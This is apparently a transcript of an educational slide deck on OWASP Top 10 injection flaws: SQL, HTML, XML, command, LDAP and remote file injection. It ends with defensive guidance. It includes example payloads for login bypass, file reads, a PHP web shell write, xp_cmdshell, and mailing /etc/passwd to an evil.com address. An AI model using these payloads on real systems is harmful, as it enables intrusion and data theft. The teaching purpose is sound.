owasp top 10 a1: injection
TRANSCRIPT
Owasp A1: Injection25 Jan 2014: Dubai, UAE.
Michael HendrickxInformation Security Consultant
Owasp Top 10 - 2013• A1: Injection• A2: Broken Authentication and Session Mgmt• A3: Cross Site Scripting• A4: Insecure Direct Object References• A5: Security Misconfiguration• A6: Sensitive Data Exposure• A7: Missing Function Level Access Control• A8: Cross Site Request Forgery• A9: Using Components with Known Vulns• A10: Invalidated Redirects and Forwards
How bad is it?
• Oct ‘13: 100k $ stolen from a California ISPhttp://thehackernews.com/2013/10/hacker-stole-100000-from-users-of.html
• Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone…http://news.softpedia.com/news/RedHack-Breaches-Istanbul-Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml
• Nov ‘12: 150k Adobe user accounts stolenhttp://www.darkreading.com/attacks-breaches/adobe-hacker-says-he-used-sql-injection/240134996
• Jul ‘12: 450k Yahoo! User accounts stolenhttp://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your-account-safe/
What is Injection?
• Web applications became more complex– Database driven– Extra functionality (email, ticket booking, ..)
• Submitting data has a special meaning to underlying technologies
• Types:– SQL Injection– XML Injection– Command Injection
WebWeb
DBDBOSOSBackend System
Backend System
What underlying technologies?
• A webserver parses and “pass on” data
Web ServerWeb Server
http://somesite.com/msg.php?id=8471350
DBDB
OSOS
Script performs business logic and parses messages to backend.“Hey, get me a message from the DB with id 8471350”
SQL Injection: Database Query
• Dynamic script to look up data in DB
Web ServerWeb Server
http://somesite.com/login.aspx?name=michael&password=secret123
DBDB
SELECT * FROM users WHERE name = ’michael’ AND password = ‘secret123’
http://somesite.com/msg.php?id=8471350
SELECT * FROM messages WHERE id = 8471350
Get indirect access to the database
SQL Injection: Database Query
• Insert value with ’ (single quote)– Single quote is delimiter for SQL queries
Web ServerWeb Server
http://somesite.com/login.php?login=mich’ael&password=secret123
DBDB
Query is incorrectly, will throw error (if not suppressed).
SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
SQL Injection: Database Query
• Insert value with ’ (single quote)– Single quote is delimiter for SQL queries
Web ServerWeb Server
http://somesite.com/login.php?login=mich’ael&password=secret123
DBDB
Query is incorrectly, will throw error (if not suppressed).
SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
SQL Injection: Database Query
• Insert value with ’ (single quote)
Web ServerWeb Server
http://somesite.com/login.php?login=michael&password=test’ OR ’a’ = ’a
DBDB
SELECT * FROM users WHERE name = ’michael’ AND password = ’test ’ OR ‘a’ = ‘a’
‘a’ will always equal ‘a’, and thus log in this user.
SQL Injection: Database Query
• “Direct” access to database• Possible to issue CRUD statements, and more
http://xkcd.com/327/
SQL Injection: Database Query
• More advanced possibilities:– Read files*:• MySQL: SELECT
HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpasswd’)) INTO DUMPFILE ‘/var/www/site.com/htdocs/test.txt’;
• MS SQL: CREATE TABLE newfile(data text);...BULK INSERT newfile FROM ‘C:\secretfile.dat’ WITH (CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’);
*: If you have the right privileges
SQL Injection: Database Query
• Write files– MySQL:
CREATE TABLE tmp(data longblog);INSERT INTO tmp(data) VALUES(0x3c3f7068);UPDATE tmp SET data=CONCAT(data, 0x20245f...);
<?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?> ...SELECT data FROM tmp INTO DUMPFILE ‘/var/www/site.com/htdocs/test.php’;
– MS SQL: CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’);
*: Again, If you have the right privileges
SQL Injection: Database Query
• SQL Map will perform attacks on target.
• Dumps entire tables• Even entire databases.• Stores everything in CSV
• More info on http://sqlmap.org
HTML Injection
• Possible to include HTML tags into fields• Used to render “special” html tags where
normal text is expected• XSS possible,
rewrite theDOM
HTML Injection
• Possible to insert iframes, fake forms, JS, …• Can be used in phishing attack
Button goes to different form, potentially stealing credentials.
XML Injection
• Web app talks to backend web services• Web app’s logic converts parameters to XML
web services (as SOAP, …)
Web ServerWeb ServerWeb serviceWeb service
Web serviceWeb service
DBDB
BackendBackend
XML Injection
http://somesite.com/create.php?name=michael&[email protected]<?xml version=“1.0” encoding=“ISO-8859-1” ?><user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:10:01</date> <name>$name</name> <email>$email</email></user>
http://somesite.com/create.php?name=michael&[email protected]</email><admin>true</admin><email>[email protected]
<?xml version=“1.0” encoding=“ISO-8859-1” ?><user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:24:48</date> <name>michael</name> <email>[email protected]</email><admin>true</admin><email>[email protected]</email></user>
Web app to create a new user
Command Injection
• Web application performs Operating System tasks– Execute external programs / scripts– List files– Send email
Web ServerWeb Server OSOS
Command Injection
• Dynamic script to share article
Web ServerWeb Server
DBDBhttp://somesite.com/[email protected]
OSOS
$ echo “check this out” | mail –s “share” [email protected]
$ echo “check this out” | mail –s “share” [email protected]; mail [email protected] < /etc/passwd
http://somesite.com/[email protected];[email protected]+<+/etc/passwd
LDAP Injection
• Lightweight Directory Access Protocol• LDAP is used to access information directories– Users– User information– Software– Computers
Web ServerWeb ServerLDAP
ServerLDAP
Server
LDAP Injection
• Insert special characters, such as (, |, &, *, …• * (asterisk) allows listing of all users
http://www.networkdls.com/articles/ldapinjection.pdf
Remote File Injection
• Scripts include other files to extend functionality
• Why? Clarity, Reuse functionality– PHP:• include(), require(), require_once(), …
– Aspx:• <!-- #include “…” -->
– JSP:• <% @include file=“…” %>
Remote File Injection
• Color chooser
• Color will load new file with color codes (blue.php, red.php, …)
• Attacker can upload malicious PHP file to an external server
http://somesite.com/mypage.php?color=blue
<?php if(isset($_GET[‘color’])){ include($_GET[‘color’].‘.php’); }?>
http://somesite.com/mypage.php?color=http://evil.com/evil.txt?
Remote (HTML) File Injection
• Theme chooser
• Can input external HTML files– That can contain JavaScript, XSS, rewrite the
DOM, etc...
• Also verify cookie contents, …
http://somesite.com/set_theme.php?theme=fancy
<link href=“/themes/<? print $_COOKIE[‘theme’] ?>.css” rel=“stylesheet” type=“text/css” />
Protect against Injection Attacks (1)
• Implement Web Application Firewall (WAF)• Prevents most common attacks– Not 100% foolproof
• Make sure it can decrypt SSL
Web ServerWeb Server DBDBWAFWAF
Protect against Injection Attacks (2)
• Validate user input, all input:– Never trust user input, ever.– Even stored input (for later use)– Force formats (numbers, email addresses, dates…)– HTTP form fields, HTTP referers, cookies, …
• Apply secure coding standards– Use prepared SQL statements– Vendor specific guidelines– OWASP secure coding practices:
https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
Protect against Injection Attacks (3)
• Adopt least-privilege policies– Give DB users least privileges– Use multiple DB users– Run processes with restricted privileges– Restrict permissions on directories
• Do your web directories really need to be writable?
• Run in sandboxed environment• Suppress error messages• Enable exception notifications– If something strange happens, reset session and
notify administrator.
So what’s next?
• Don’t trust your user input.• Don’t trust your user input.• Adopt secure coding policies• Implement defense in depth• Do log analysis to detect anomalies• And don’t trust your user input.
